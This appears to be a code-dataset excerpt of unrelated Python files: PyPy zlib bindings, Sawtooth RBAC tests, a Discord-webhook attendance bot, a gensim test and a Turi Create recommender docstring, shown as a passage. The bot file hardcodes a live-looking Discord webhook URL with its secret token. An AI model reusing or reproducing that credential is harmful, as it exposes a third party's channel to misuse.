rzlib.RZlibError as e: raise zlib_error(space, e.msg) return space.wrap(result) @unwrap_spec(string='bufferstr', wbits="c_int", bufsize=int) def decompress(space, string, wbits=rzlib.MAX_WBITS, bufsize=0): """ decompress(string[, wbits[, bufsize]]) -- Return decompressed string. Optional arg wbits is the window buffer size. Optional arg bufsize is only for compatibility with CPython and is ignored. """ try: try: stream = rzlib.inflateInit(wbits) except ValueError: raise zlib_error(space, "Bad window buffer size") try: result, _, _ = rzlib.decompress(stream, string, rzlib.Z_FINISH) finally: rzlib.inflateEnd(stream) except rzlib.RZlibError as e: raise zlib_error(space, e.msg) return space.wrap(result) class ZLibObject(W_Root): """ Common base class for Compress and Decompress. """ stream = rzlib.null_stream def __init__(self, space): self._lock = space.allocate_lock() def lock(self): """To call before using self.stream.""" self._lock.acquire(True) def unlock(self): """To call after using self.stream.""" self._lock.release() keepalive_until_here(self) # subtle: we have to make sure that 'self' is not garbage-collected # while we are still using 'self.stream' - hence the keepalive. class Compress(ZLibObject): """ Wrapper around zlib's z_stream structure which provides convenient compression functionality. """ def __init__(self, space, level=rzlib.Z_DEFAULT_COMPRESSION, method=rzlib.Z_DEFLATED, # \ wbits=rzlib.MAX_WBITS, # \ undocumented memLevel=rzlib.DEF_MEM_LEVEL, # / parameters strategy=rzlib.Z_DEFAULT_STRATEGY): # / ZLibObject.__init__(self, space) try: self.stream = rzlib.deflateInit(level, method, wbits, memLevel, strategy) except rzlib.RZlibError as e: raise zlib_error(space, e.msg) except ValueError: raise oefmt(space.w_ValueError, "Invalid initialization option") self.register_finalizer(space) def _finalize_(self): """Automatically free the resources used by the stream.""" if self.stream: rzlib.deflateEnd(self.stream) self.stream = rzlib.null_stream @unwrap_spec(data='bufferstr') def compress(self, space, data): """ compress(data) -- Return a string containing data compressed. After calling this function, some of the input data may still be stored in internal buffers for later processing. Call the flush() method to clear these buffers. """ try: self.lock() try: if not self.stream: raise zlib_error(space, "compressor object already flushed") result = rzlib.compress(self.stream, data) finally: self.unlock() except rzlib.RZlibError as e: raise zlib_error(space, e.msg) return space.wrap(result) @unwrap_spec(mode="c_int") def flush(self, space, mode=rzlib.Z_FINISH): """ flush( [mode] ) -- Return a string containing any remaining compressed data. mode can be one of the constants Z_SYNC_FLUSH, Z_FULL_FLUSH, Z_FINISH; the default value used when mode is not specified is Z_FINISH. If mode == Z_FINISH, the compressor object can no longer be used after calling the flush() method. Otherwise, more data can still be compressed. """ try: self.lock() try: if not self.stream: raise zlib_error(space, "compressor object already flushed") result = rzlib.compress(self.stream, '', mode) if mode == rzlib.Z_FINISH: # release the data structures now rzlib.deflateEnd(self.stream) self.stream = rzlib.null_stream finally: self.unlock() except rzlib.RZlibError as e: raise zlib_error(space, e.msg) return space.wrap(result) @unwrap_spec(level=int, method=int, wbits=int, memLevel=int, strategy=int) def Compress___new__(space, w_subtype, level=rzlib.Z_DEFAULT_COMPRESSION, method=rzlib.Z_DEFLATED, # \ wbits=rzlib.MAX_WBITS, # \ undocumented memLevel=rzlib.DEF_MEM_LEVEL, # / parameters strategy=rzlib.Z_DEFAULT_STRATEGY): # / """ Create a new z_stream and call its initializer. """ stream = space.allocate_instance(Compress, w_subtype) stream = space.interp_w(Compress, stream) Compress.__init__(stream, space, level, method, wbits, memLevel, strategy) return space.wrap(stream) Compress.typedef = TypeDef( 'Compress', __new__ = interp2app(Compress___new__), compress = interp2app(Compress.compress), flush = interp2app(Compress.flush), __doc__ = """compressobj([level]) -- Return a compressor object. Optional arg level is the compression level, in 1-9. """) class Decompress(ZLibObject): """ Wrapper around zlib's z_stream structure which provides convenient decompression functionality. """ def __init__(self, space, wbits=rzlib.MAX_WBITS): """ Initialize a new decompression object. wbits is an integer between 8 and MAX_WBITS or -8 and -MAX_WBITS (inclusive) giving the number of "window bits" to use for compression and decompression. See the documentation for deflateInit2 and inflateInit2. """ ZLibObject.__init__(self, space) self.unused_data = '' self.unconsumed_tail = '' try: self.stream = rzlib.inflateInit(wbits) except rzlib.RZlibError as e: raise zlib_error(space, e.msg) except ValueError: raise oefmt(space.w_ValueError, "Invalid initialization option") self.register_finalizer(space) def _finalize_(self): """Automatically free the resources used by the stream.""" if self.stream: rzlib.inflateEnd(self.stream) self.stream = rzlib.null_stream def _save_unconsumed_input(self, data, finished, unused_len): unused_start = len(data) - unused_len assert unused_start >= 0 tail = data[unused_start:] if finished: self.unconsumed_tail = '' self.unused_data += tail else: self.unconsumed_tail = tail @unwrap_spec(data='bufferstr', max_length="c_int") def decompress(self, space, data, max_length=0): """ decompress(data[, max_length]) -- Return a string containing the decompressed version of the data. If the max_length parameter is specified then the return value will be no longer than max_length. Unconsumed input data will be stored in the unconsumed_tail attribute. """ if max_length == 0: max_length = sys.maxint elif max_length < 0: raise oefmt(space.w_ValueError, "max_length must be greater than zero") try: self.lock() try: result = rzlib.decompress(self.stream, data, max_length=max_length) finally: self.unlock() except rzlib.RZlibError as e: raise zlib_error(space, e.msg) string, finished, unused_len = result self._save_unconsumed_input(data, finished, unused_len) return space.wrap(string) def flush(self, space, w_length=None): """ flush( [length] ) -- This is kept for backward compatibility, because each call to decompress() immediately returns as much data as possible. """ if w_length is not None: length = space.c_int_w(w_length) if length <= 0: raise oefmt(space.w_ValueError, "length must be greater than zero") data = self.unconsumed_tail try: self.lock() try: result = rzlib.decompress(self.stream, data, rzlib.Z_FINISH) finally: self.unlock() except rzlib.RZlibError: string = "" else: string, finished, unused_len = result self._save_unconsumed_input(data, finished, unused_len) return space.wrap(string) @unwrap_spec(wbits=int) def Decompress___new__(space, w_subtype, wbits=rzlib.MAX_WBITS): """ Create a new Decompress and call its initializer. """ stream = space.allocate_instance(Decompress, w_subtype) stream = space.interp_w(Decompress, stream) Decompress.__init__(stream, space, wbits) return space.wrap(stream) Decompress.typedef = TypeDef( 'Decompress', __new__ = interp2app(Decompress___new__), decompress = interp2app(Decompress.decompress), flush = interp2app(Decompress.flush), unused_data = interp_attrproperty('unused_data', Decompress), unconsumed_tail = interp_attrproperty('unconsumed_tail', Decompress), __doc__ = """decompressobj([wbits]) -- Return a decompressor object. Optional arg wbits is the window buffer size. """)
35.050562
83
0.626543
446457d16d65753f9acb5e516d09fa9367eeddf3
3,847
py
Python
tests/rbac/common/role/propose_admin_tests.py
fthornton67/sawtooth-next-directory
79479afb8d234911c56379bb1d8abf11f28ef86d
[ "Apache-2.0" ]
75
2018-04-06T09:13:34.000Z
2020-05-18T18:59:47.000Z
tests/rbac/common/role/propose_admin_tests.py
fthornton67/sawtooth-next-directory
79479afb8d234911c56379bb1d8abf11f28ef86d
[ "Apache-2.0" ]
989
2018-04-18T21:01:56.000Z
2019-10-23T15:37:09.000Z
tests/rbac/common/role/propose_admin_tests.py
fthornton67/sawtooth-next-directory
79479afb8d234911c56379bb1d8abf11f28ef86d
[ "Apache-2.0" ]
72
2018-04-13T18:29:12.000Z
2020-05-29T06:00:33.000Z
# Copyright 2019 Contributors to Hyperledger Sawtooth # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ----------------------------------------------------------------------------- """Propose Role Add Admin Test""" # pylint: disable=no-member import pytest from rbac.common import addresser from rbac.common.role import Role from rbac.common.user import User from rbac.common import protobuf from rbac.common.logs import get_default_logger from tests.rbac.common import helper LOGGER = get_default_logger(__name__) @pytest.mark.role @pytest.mark.library def test_make(): """Test making the message""" next_id = helper.user.id() role_id = helper.role.id() proposal_id = addresser.proposal.unique_id() reason = helper.proposal.reason() message = Role().admin.propose.make( proposal_id=proposal_id, next_id=next_id, role_id=role_id, reason=reason, metadata=None, ) assert isinstance(message, protobuf.role_transaction_pb2.ProposeAddRoleAdmin) assert message.proposal_id == proposal_id assert message.next_id == next_id assert message.role_id == role_id assert message.reason == reason @pytest.mark.role @pytest.mark.library def test_make_addresses(): """Test making the message addresses""" next_id = helper.user.id() user_address = User().address(next_id) role_id = helper.role.id() role_address = Role().address(role_id) proposal_id = addresser.proposal.unique_id() reason = helper.proposal.reason() relationship_address = Role().admin.address(role_id, next_id) proposal_address = Role().admin.propose.address(role_id, next_id) signer_user_id = helper.user.id() message = Role().admin.propose.make( proposal_id=proposal_id, next_id=next_id, role_id=role_id, reason=reason, metadata=None, ) inputs, outputs = Role().admin.propose.make_addresses( message=message, signer_user_id=signer_user_id ) assert relationship_address in inputs assert user_address in inputs assert role_address in inputs assert proposal_address in inputs assert proposal_address in outputs @pytest.mark.role @pytest.mark.propose_role_admin def test_create(): """Test executing the message on the blockchain""" role, _, _ = helper.role.create() proposal_id = addresser.proposal.unique_id() reason = helper.proposal.reason() user, signer_keypair = helper.user.create() message = Role().admin.propose.make( proposal_id=proposal_id, next_id=user.next_id, role_id=role.role_id, reason=reason, metadata=None, ) status = Role().admin.propose.new( signer_keypair=signer_keypair, signer_user_id=user.next_id, message=message ) assert len(status) == 1 assert status[0]["status"] == "COMMITTED" proposal = Role().admin.propose.get(object_id=role.role_id, related_id=user.next_id) assert isinstance(proposal, protobuf.proposal_state_pb2.Proposal) assert proposal.proposal_type, protobuf.proposal_state_pb2.Proposal.ADD_ROLE_ADMIN assert proposal.proposal_id == proposal_id assert proposal.object_id == role.role_id assert proposal.related_id == user.next_id assert proposal.opener == user.next_id assert proposal.open_reason == reason
32.058333
88
0.706005
92d72026931063ce5b08b18abe6c3b3e04c42a13
2,429
py
Python
AttendanceBot/discordbot.py
Aadityaprabu002/GoogleMeet_Attendance_Bot
86aee5072d3c4035a051c51fe2c00e9c739e90af
[ "MIT" ]
1
2021-11-28T17:43:39.000Z
2021-11-28T17:43:39.000Z
AttendanceBot/discordbot.py
Aadityaprabu002/GoogleMeet_Attendance_Bot
86aee5072d3c4035a051c51fe2c00e9c739e90af
[ "MIT" ]
null
null
null
AttendanceBot/discordbot.py
Aadityaprabu002/GoogleMeet_Attendance_Bot
86aee5072d3c4035a051c51fe2c00e9c739e90af
[ "MIT" ]
null
null
null
from discord_webhook import DiscordWebhook from discord_webhook import DiscordEmbed URL = 'https://discord.com/api/webhooks/774702675114983466/ToCCEVBBr6R5deNpixqkSbIFM_Z_VAXeBDqP57c-iYumLVIiucrv9I4-BA-Dj8GqVoI2' def send_start_details(SUBJECT,NAME): webhook = DiscordWebhook(url = URL) embed = DiscordEmbed(title ='CLASS DETAILS',color = 3800832,description='Class Successfully Started') embed.add_embed_field(name='SUBJECT', value=NAME) embed.add_embed_field(name='DATE', value=SUBJECT['date']) embed.add_embed_field(name='DAY', value=SUBJECT['day']) embed.add_embed_field(name='START TIME:', value=SUBJECT['start']) embed.add_embed_field(name='LINK', value=SUBJECT['URL']) webhook.add_embed(embed) response = webhook.execute() def send_end_details(SUBJECT,NAME): webhook = DiscordWebhook(url=URL) embed = DiscordEmbed(title='CLASS DETAILS', color=3801087, description='Class Successfully Ended') embed.add_embed_field(name='SUBJECT', value=NAME.upper()) embed.add_embed_field(name='DATE', value=SUBJECT['date']) embed.add_embed_field(name='DAY', value=SUBJECT['day']) embed.add_embed_field(name='END TIME', value=SUBJECT['end']) embed.add_embed_field(name='LINK', value=SUBJECT['URL']) webhook.add_embed(embed) response = webhook.execute() def send_start_error_details(SUBJECT,NAME): webhook = DiscordWebhook(url=URL) embed = DiscordEmbed(title='CLASS DETAILS', color=3801087, description='ERROR JOINING CLASS!!!!') embed.add_embed_field(name='SUBJECT', value=NAME.upper()) embed.add_embed_field(name='DATE', value=SUBJECT['date']) embed.add_embed_field(name='DAY', value=SUBJECT['day']) embed.add_embed_field(name='END TIME', value=SUBJECT['end']) embed.add_embed_field(name='LINK', value=SUBJECT['URL']) webhook.add_embed(embed) response = webhook.execute() def send_end_error_details(SUBJECT,NAME): webhook = DiscordWebhook(url=URL) embed = DiscordEmbed(title='CLASS DETAILS' , color=3801087, description='ERROR LEAVING CLASS!!!!') embed.add_embed_field(name='SUBJECT', value=NAME) embed.add_embed_field(name='DATE', value=SUBJECT['date']) embed.add_embed_field(name='DAY', value=SUBJECT['day']) embed.add_embed_field(name='END TIME:', value=SUBJECT['end']) embed.add_embed_field(name='LINK', value=SUBJECT['URL']) webhook.add_embed(embed) response = webhook.execute()
44.981481
128
0.735282
3086520031a94358fd79da558b632ebb6cdec06c
885
py
Python
tests/clustering_system/corpus/test_FolderAggregatedBowNewsCorpora.py
vanam/clustering
6e3d3ce7e60e31519b81547bc4afdf6ef3b0079f
[ "MIT" ]
5
2019-05-28T15:45:46.000Z
2020-10-05T17:48:27.000Z
tests/clustering_system/corpus/test_FolderAggregatedBowNewsCorpora.py
vanam/clustering
6e3d3ce7e60e31519b81547bc4afdf6ef3b0079f
[ "MIT" ]
null
null
null
tests/clustering_system/corpus/test_FolderAggregatedBowNewsCorpora.py
vanam/clustering
6e3d3ce7e60e31519b81547bc4afdf6ef3b0079f
[ "MIT" ]
2
2019-07-16T14:13:19.000Z
2020-11-23T01:53:44.000Z
import os import tempfile from gensim.corpora import Dictionary from clustering_system.corpus.FolderAggregatedBowNewsCorpora import FolderAggregatedBowNewsCorpora class TestFolderAggregatedBowNewsCorpora: def test_create(self): # Current directory dir_path = os.path.dirname(os.path.realpath(__file__)) data_path = os.path.join(dir_path, "..", "data") dictionary_file = os.path.join(dir_path, "data", "dictionary.dict") dictionary = Dictionary.load(dictionary_file) temp_dir = tempfile.TemporaryDirectory() corpora = FolderAggregatedBowNewsCorpora(data_path, temp_dir.name, dictionary, language="en") i = 0 for c in corpora: i += 1 # Traverse corpus for _ in c: pass # Assert number of times it went through the loop assert i == 1
27.65625
101
0.662147
26a831742bba45b470c99fd19937852f548ebc95
25,611
py
Python
src/unity/python/turicreate/toolkits/recommender/ranking_factorization_recommender.py
LeeCenY/turicreate
fb2f3bf313e831ceb42a2e10aacda6e472ea8d93
[ "BSD-3-Clause" ]
null
null
null
src/unity/python/turicreate/toolkits/recommender/ranking_factorization_recommender.py
LeeCenY/turicreate
fb2f3bf313e831ceb42a2e10aacda6e472ea8d93
[ "BSD-3-Clause" ]
null
null
null
src/unity/python/turicreate/toolkits/recommender/ranking_factorization_recommender.py
LeeCenY/turicreate
fb2f3bf313e831ceb42a2e10aacda6e472ea8d93
[ "BSD-3-Clause" ]
null
null
null
# -*- coding: utf-8 -*- # Copyright © 2017 Apple Inc. All rights reserved. # # Use of this source code is governed by a BSD-3-clause license that can # be found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause """ Methods for performing doing matrix factorization and factorization machines for making a ranking-based recommender. See turicreate.recommender.ranking_factorization_recommender.create for additional documentation. """ from __future__ import print_function as _ from __future__ import division as _ from __future__ import absolute_import as _ import turicreate as _turicreate from turicreate.toolkits.recommender.util import _Recommender from turicreate.toolkits._model import _get_default_options_wrapper def create(observation_data, user_id='user_id', item_id='item_id', target=None, user_data=None, item_data=None, num_factors=32, regularization=1e-9, linear_regularization=1e-9, side_data_factorization=True, ranking_regularization=0.25, unobserved_rating_value=None, num_sampled_negative_examples=4, max_iterations=25, sgd_step_size=0, random_seed=0, binary_target = False, solver = 'auto', verbose=True, **kwargs): """Create a RankingFactorizationRecommender that learns latent factors for each user and item and uses them to make rating predictions. Parameters ---------- observation_data : SFrame The dataset to use for training the model. It must contain a column of user ids and a column of item ids. Each row represents an observed interaction between the user and the item. The (user, item) pairs are stored with the model so that they can later be excluded from recommendations if desired. It can optionally contain a target ratings column. All other columns are interpreted by the underlying model as side features for the observations. The user id and item id columns must be of type 'int' or 'str'. The target column must be of type 'int' or 'float'. user_id : string, optional The name of the column in `observation_data` that corresponds to the user id. item_id : string, optional The name of the column in `observation_data` that corresponds to the item id. target : string, optional The `observation_data` can optionally contain a column of scores representing ratings given by the users. If present, the name of this column may be specified variables `target`. user_data : SFrame, optional Side information for the users. This SFrame must have a column with the same name as what is specified by the `user_id` input parameter. `user_data` can provide any amount of additional user-specific information. item_data : SFrame, optional Side information for the items. This SFrame must have a column with the same name as what is specified by the `item_id` input parameter. `item_data` can provide any amount of additional item-specific information. num_factors : int, optional Number of latent factors. regularization : float, optional L2 regularization for interaction terms. Default: 1e-10; a typical range for this parameter is between 1e-12 and 1. Setting this to 0 may cause numerical issues. linear_regularization : float, optional L2 regularization for linear term. Default: 1e-10; a typical range for this parameter is between 1e-12 and 1. Setting this to 0 may cause numerical issues. side_data_factorization : boolean, optional Use factorization for modeling any additional features beyond the user and item columns. If True, and side features or any additional columns are present, then a Factorization Machine model is trained. Otherwise, only the linear terms are fit to these features. See :class:`turicreate.recommender.ranking_factorization_recommender.RankingFactorizationRecommender` for more information. Default: True. ranking_regularization : float, optional Penalize the predicted value of user-item pairs not in the training set. Larger values increase this penalization. Suggested values: 0, 0.1, 0.5, 1. NOTE: if no target column is present, this parameter is ignored. unobserved_rating_value : float, optional Penalize unobserved items with a larger predicted score than this value. By default, the estimated 5% quantile is used (mean - 1.96*std_dev). num_sampled_negative_examples : integer, optional For each (user, item) pair in the data, the ranking sgd solver evaluates this many randomly chosen unseen items for the negative example step. Increasing this can give better performance at the expense of speed, particularly when the number of items is large. Default is 4. binary_target : boolean, optional Assume the target column is composed of 0's and 1's. If True, use logistic loss to fit the model. max_iterations : int, optional The training algorithm will make at most this many iterations through the observed data. Default: 50. sgd_step_size : float, optional Step size for stochastic gradient descent. Smaller values generally lead to more accurate models that take more time to train. The default setting of 0 means that the step size is chosen by trying several options on a small subset of the data. random_seed : int, optional The random seed used to choose the initial starting point for model training. Note that some randomness in the training is unavoidable, so models trained with the same random seed may still differ. Default: 0. solver : string, optional Name of the solver to be used to solve the regression. See the references for more detail on each solver. The available solvers for this model are: - *auto (default)*: automatically chooses the best solver for the data and model parameters. - *ials*: Implicit Alternating Least Squares [1]. - *adagrad*: Adaptive Gradient Stochastic Gradient Descent. - *sgd*: Stochastic Gradient Descent verbose : bool, optional Enables verbose output. kwargs : optional Optional advanced keyword arguments passed in to the model optimization procedure. These parameters do not typically need to be changed. Examples -------- **Basic usage** When given just user and item pairs, one can create a RankingFactorizationRecommender as follows. >>> sf = turicreate.SFrame({'user_id': ["0", "0", "0", "1", "1", "2", "2", "2"], ... 'item_id': ["a", "b", "c", "a", "b", "b", "c", "d"]) >>> from turicreate.recommender import ranking_factorization_recommender >>> m1 = ranking_factorization_recommender.create(sf) When a target column is present, one can include this to try and recommend items that are rated highly. >>> sf = turicreate.SFrame({'user_id': ["0", "0", "0", "1", "1", "2", "2", "2"], ... 'item_id': ["a", "b", "c", "a", "b", "b", "c", "d"], ... 'rating': [1, 3, 2, 5, 4, 1, 4, 3]}) >>> m1 = ranking_factorization_recommender.create(sf, target='rating') **Including side features** >>> user_info = turicreate.SFrame({'user_id': ["0", "1", "2"], ... 'name': ["Alice", "Bob", "Charlie"], ... 'numeric_feature': [0.1, 12, 22]}) >>> item_info = turicreate.SFrame({'item_id': ["a", "b", "c", "d"], ... 'name': ["item1", "item2", "item3", "item4"], ... 'dict_feature': [{'a' : 23}, {'a' : 13}, ... {'b' : 1}, ... {'a' : 23, 'b' : 32}]}) >>> m2 = ranking_factorization_recommender.create(sf, target='rating', ... user_data=user_info, ... item_data=item_info) **Customizing ranking regularization** Create a model that pushes predicted ratings of unobserved user-item pairs toward 1 or below. >>> m3 = ranking_factorization_recommender.create(sf, target='rating', ... ranking_regularization = 0.1, ... unobserved_rating_value = 1) **Using the implicit alternating least squares model** Ranking factorization also implements implicit alternating least squares [1] as an alternative solver. This is enable using ``solver = 'ials'``. >>> m3 = ranking_factorization_recommender.create(sf, target='rating', solver = 'ials') See Also -------- :class:`turicreate.recommender.factorization_recommender.FactorizationRecommender`, :class:`turicreate.recommender.ranking_factorization_recommender.RankingFactorizationRecommender` References ----------- [1] Collaborative Filtering for Implicit Feedback Datasets Hu, Y.; Koren, Y.; Volinsky, C. IEEE International Conference on Data Mining (ICDM 2008), IEEE (2008). """ from turicreate._cython.cy_server import QuietProgress opts = {} model_proxy = _turicreate.extensions.ranking_factorization_recommender() model_proxy.init_options(opts) if user_data is None: user_data = _turicreate.SFrame() if item_data is None: item_data = _turicreate.SFrame() nearest_items = _turicreate.SFrame() if target is None: binary_target = True opts = {'user_id' : user_id, 'item_id' : item_id, 'target' : target, 'random_seed' : random_seed, 'num_factors' : num_factors, 'regularization' : regularization, 'linear_regularization' : linear_regularization, 'ranking_regularization' : ranking_regularization, 'binary_target' : binary_target, 'max_iterations' : max_iterations, 'side_data_factorization' : side_data_factorization, 'num_sampled_negative_examples' : num_sampled_negative_examples, 'solver' : solver, # Has no effect here. 'sgd_step_size' : sgd_step_size} if unobserved_rating_value is not None: opts["unobserved_rating_value"] = unobserved_rating_value if kwargs: try: possible_args = set(_get_default_options()["name"]) except (RuntimeError, KeyError): possible_args = set() bad_arguments = set(kwargs.keys()).difference(possible_args) if bad_arguments: raise TypeError("Bad Keyword Arguments: " + ', '.join(bad_arguments)) opts.update(kwargs) extra_data = {"nearest_items" : _turicreate.SFrame()} with QuietProgress(verbose): model_proxy.train(observation_data, user_data, item_data, opts, extra_data) return RankingFactorizationRecommender(model_proxy) _get_default_options = _get_default_options_wrapper( 'ranking_factorization_recommender', 'recommender.RankingFactorizationRecommender', 'RankingFactorizationRecommender') class RankingFactorizationRecommender(_Recommender): r""" A RankingFactorizationRecommender learns latent factors for each user and item and uses them to rank recommended items according to the likelihood of observing those (user, item) pairs. This is commonly desired when performing collaborative filtering for implicit feedback datasets or datasets with explicit ratings for which ranking prediction is desired. RankingFactorizationRecommender contains a number of options that tailor to a variety of datasets and evaluation metrics, making this one of the most powerful models in the Turi Create recommender toolkit. **Creating a RankingFactorizationRecommender** This model cannot be constructed directly. Instead, use :func:`turicreate.recommender.ranking_factorization_recommender.create` to create an instance of this model. A detailed list of parameter options and code samples are available in the documentation for the create function. **Side information** Side features may be provided via the `user_data` and `item_data` options when the model is created. Additionally, observation-specific information, such as the time of day when the user rated the item, can also be included. Any column in the `observation_data` SFrame that is not the user id, item id, or target is treated as a observation side features. The same side feature columns must be present when calling :meth:`predict`. Side features may be numeric or categorical. User ids and item ids are treated as categorical variables. For the additional side features, the type of the :class:`~turicreate.SFrame` column determines how it's handled: strings are treated as categorical variables and integers and floats are treated as numeric variables. Dictionaries and numeric arrays are also supported. **Optimizing for ranking performance** By default, RankingFactorizationRecommender optimizes for the precision-recall performance of recommendations. **Model parameters** Trained model parameters may be accessed using `m.get('coefficients')` or equivalently `m['coefficients']`, where `m` is a RankingFactorizationRecommender. See Also -------- create, :func:`turicreate.recommender.factorization_recommender.create` Notes ----- **Model Details** `RankingFactorizationRecommender` trains a model capable of predicting a score for each possible combination of users and items. The internal coefficients of the model are learned from known scores of users and items. Recommendations are then based on these scores. In the two factorization models, users and items are represented by weights and factors. These model coefficients are learned during training. Roughly speaking, the weights, or bias terms, account for a user or item's bias towards higher or lower ratings. For example, an item that is consistently rated highly would have a higher weight coefficient associated with them. Similarly, an item that consistently receives below average ratings would have a lower weight coefficient to account for this bias. The factor terms model interactions between users and items. For example, if a user tends to love romance movies and hate action movies, the factor terms attempt to capture that, causing the model to predict lower scores for action movies and higher scores for romance movies. Learning good weights and factors is controlled by several options outlined below. More formally, the predicted score for user :math:`i` on item :math:`j` is given by .. math:: \operatorname{score}(i, j) = \mu + w_i + w_j + \mathbf{a}^T \mathbf{x}_i + \mathbf{b}^T \mathbf{y}_j + {\mathbf u}_i^T {\mathbf v}_j, where :math:`\mu` is a global bias term, :math:`w_i` is the weight term for user :math:`i`, :math:`w_j` is the weight term for item :math:`j`, :math:`\mathbf{x}_i` and :math:`\mathbf{y}_j` are respectively the user and item side feature vectors, and :math:`\mathbf{a}` and :math:`\mathbf{b}` are respectively the weight vectors for those side features. The latent factors, which are vectors of length ``num_factors``, are given by :math:`{\mathbf u}_i` and :math:`{\mathbf v}_j`. **Training the model** The model is trained using Stochastic Gradient Descent with additional tricks to improve convergence. The optimization is done in parallel over multiple threads. This procedure is inherently random, so different calls to `create()` may return slightly different models, even with the same `random_seed`. In the explicit rating case, the objective function we are optimizing for is: .. math:: \min_{\mathbf{w}, \mathbf{a}, \mathbf{b}, \mathbf{V}, \mathbf{U}} \frac{1}{|\mathcal{D}|} \sum_{(i,j,r_{ij}) \in \mathcal{D}} \mathcal{L}(\operatorname{score}(i, j), r_{ij}) + \lambda_1 (\lVert {\mathbf w} \rVert^2_2 + || {\mathbf a} ||^2_2 + || {\mathbf b} ||^2_2 ) + \lambda_2 \left(\lVert {\mathbf U} \rVert^2_2 + \lVert {\mathbf V} \rVert^2_2 \right) where :math:`\mathcal{D}` is the observation dataset, :math:`r_{ij}` is the rating that user :math:`i` gave to item :math:`j`, :math:`{\mathbf U} = ({\mathbf u}_1, {\mathbf u}_2, ...)` denotes the user's latent factors and :math:`{\mathbf V} = ({\mathbf v}_1, {\mathbf v}_2, ...)` denotes the item latent factors. The loss function :math:`\mathcal{L}(\hat{y}, y)` is :math:`(\hat{y} - y)^2` by default. :math:`\lambda_1` denotes the `linear_regularization` parameter and :math:`\lambda_2` the `regularization` parameter. When ``ranking_regularization`` is nonzero, then the equation above gets an additional term. Let :math:`\lambda_{\text{rr}}` represent the value of `ranking_regularization`, and let :math:`v_{\text{ur}}` represent `unobserved_rating_value`. Then the objective we attempt to minimize is: .. math:: \min_{\mathbf{w}, \mathbf{a}, \mathbf{b}, \mathbf{V}, \mathbf{U}} \frac{1}{|\mathcal{D}|} \sum_{(i,j,r_{ij}) \in \mathcal{D}} \mathcal{L}(\operatorname{score}(i, j), r_{ij}) + \lambda_1 (\lVert {\mathbf w} \rVert^2_2 + || {\mathbf a} ||^2_2 + || {\mathbf b} ||^2_2 ) + \lambda_2 \left(\lVert {\mathbf U} \rVert^2_2 + \lVert {\mathbf V} \rVert^2_2 \right) \\ + \frac{\lambda_{rr}}{\text{const} * |\mathcal{U}|} \sum_{(i,j) \in \mathcal{U}} \mathcal{L}\left(\operatorname{score}(i, j), v_{\text{ur}}\right), where :math:`\mathcal{U}` is a sample of unobserved user-item pairs. In the implicit case when there are no target values, we use logistic loss to fit a model that attempts to predict all the given (user, item) pairs in the training data as 1 and all others as 0. To train this model, we sample an unobserved item along with each observed (user, item) pair, using SGD to push the score of the observed pair towards 1 and the unobserved pair towards 0. In this case, the `ranking_regularization` parameter is ignored. When `binary_targets=True`, then the target values must be 0 or 1; in this case, we also use logistic loss to train the model so the predicted scores are as close to the target values as possible. This time, the rating of the sampled unobserved pair is set to 0 (thus the `unobserved_rating_value` is ignored). In this case, the loss on the unobserved pairs is weighted by `ranking_regularization` as in the non-binary case. To choose the unobserved pair complementing a given observation, the algorithm selects several (defaults to four) candidate negative items that the user in the given observation has not rated. The algorithm scores each one using the current model, then chooses the item with the largest predicted score. This adaptive sampling strategy provides faster convergence than just sampling a single negative item. The Factorization Machine is a generalization of Matrix Factorization. Like matrix factorization, it predicts target rating values as a weighted combination of user and item latent factors, biases, side features, and their pairwise combinations. In particular, while Matrix Factorization learns latent factors for only the user and item interactions, the Factorization Machine learns latent factors for all variables, including side features, and also allows for interactions between all pairs of variables. Thus the Factorization Machine is capable of modeling complex relationships in the data. Typically, using `linear_side_features=True` performs better in terms of RMSE, but may require a longer training time. num_sampled_negative_examples: For each (user, item) pair in the data, the ranking sgd solver evaluates this many randomly chosen unseen items for the negative example step. Increasing this can give better performance at the expense of speed, particularly when the number of items is large. When `ranking_regularization` is larger than zero, the model samples a small set of unobserved user-item pairs and attempts to drive their rating predictions below the value specified with `unobserved_rating_value`. This has the effect of improving the precision-recall performance of recommended items. ** Implicit Matrix Factorization** `RankingFactorizationRecommender` had an additional option of optimizing for ranking using the implicit matrix factorization model. The internal coefficients of the model and its interpretation are identical to the model described above. The difference between the two models is in the nature in which the objective is achieved. Currently, this model does not incorporate any columns beyond user/item (and rating) or side data. The model works by transferring the raw observations (or weights) (r) into two separate magnitudes with distinct interpretations: preferences (p) and confidence levels (c). The functional relationship between the weights (r) and the confidence is either linear or logarithmic which can be toggled by setting `ials_confidence_scaling_type` = `linear` (the default) or `log` respectively. The rate of increase of the confidence with respect to the weights is proportional to the `ials_confidence_scaling_factor` (default 1.0). Examples -------- **Basic usage** >>> sf = turicreate.SFrame({'user_id': ["0", "0", "0", "1", "1", "2", "2", "2"], ... 'item_id': ["a", "b", "c", "a", "b", "b", "c", "d"], ... 'rating': [1, 3, 2, 5, 4, 1, 4, 3]}) >>> m1 = turicreate.ranking_factorization_recommender.create(sf, target='rating') For implicit data, no target column is specified: >>> sf = turicreate.SFrame({'user': ["0", "0", "0", "1", "1", "2", "2", "2"], ... 'movie': ["a", "b", "c", "a", "b", "b", "c", "d"]}) >>> m2 = turicreate.ranking_factorization_recommender.create(sf, 'user', 'movie') **Implicit Matrix Factorization** >>> sf = turicreate.SFrame({'user_id': ["0", "0", "0", "1", "1", "2", "2", "2"], ... 'item_id': ["a", "b", "c", "a", "b", "b", "c", "d"], ... 'rating': [1, 3, 2, 5, 4, 1, 4, 3]}) >>> m1 = turicreate.ranking_factorization_recommender.create(sf, target='rating', solver='ials') For implicit data, no target column is specified: >>> sf = turicreate.SFrame({'user': ["0", "0", "0", "1", "1", "2", "2", "2"], ... 'movie': ["a", "b", "c", "a", "b", "b", "c", "d"]}) >>> m2 = turicreate.ranking_factorization_recommender.create(sf, 'user', 'movie', solver='ials') **Including side features** >>> user_info = turicreate.SFrame({'user_id': ["0", "1", "2"], ... 'name': ["Alice", "Bob", "Charlie"], ... 'numeric_feature': [0.1, 12, 22]}) >>> item_info = turicreate.SFrame({'item_id': ["a", "b", "c", "d"], ... 'name': ["item1", "item2", "item3", "item4"], ... 